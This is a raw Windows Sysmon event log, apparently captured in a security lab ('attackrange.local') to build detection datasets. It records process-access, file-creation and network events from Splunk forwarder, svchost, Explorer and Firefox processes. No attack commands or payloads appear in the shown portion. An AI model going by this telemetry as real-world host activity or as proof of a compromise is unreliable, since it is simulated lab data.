08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054474Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054473Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054472Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054471Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054470Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054469Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054468Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054467Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054466Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054465Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054464Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054463Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054462Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054461Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054460Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054459Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054458Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054457Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054456Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054455Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001054454Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.603{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\axpgvkas.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=A9D920D6EEB98721871E9523BA384123,SHA256=83898458F4CC47E7E7AFD902E603A959DBF51B7CAEBC0FC9D1C6D9AB7E0EE235,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054453Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.516{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C750D55CC5C176C5ADA9F27B961BACE9,SHA256=3E2496640E0B52D3A2FECAB98EBFD6397113DC3DCA31F245AFA87168A906060F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810259Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:20.983{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57457-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x80000000000000001054524Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:23.537{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0DAD55ADD79F4C1C8F2A8E5D47FF1245,SHA256=233DA09F6036FC5477506986839AC89EEFCFAF466B761A57F8F168A6E3EF6D75,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810261Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:23.381{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62B6794975EF7715B8C09992CD781CC7,SHA256=2A6224E26BE7FEE16E34B52FE7213E1EDAE5CDE80E645D00058F1F243CBE3003,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054525Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:24.552{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A7A1D979A3DD29E5B64011CCABB5DED,SHA256=7AAF248DE76B77C90466CEFECBBE1DA5A6EDC05AD43AD287934426C6D9A5DE75,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000810290Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:24.912{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F83C-60EB-DD79-00000000D001}868C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810289Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:24.912{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810288Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:24.912{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810287Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:24.912{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810286Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:24.912{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810285Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:24.912{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810284Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 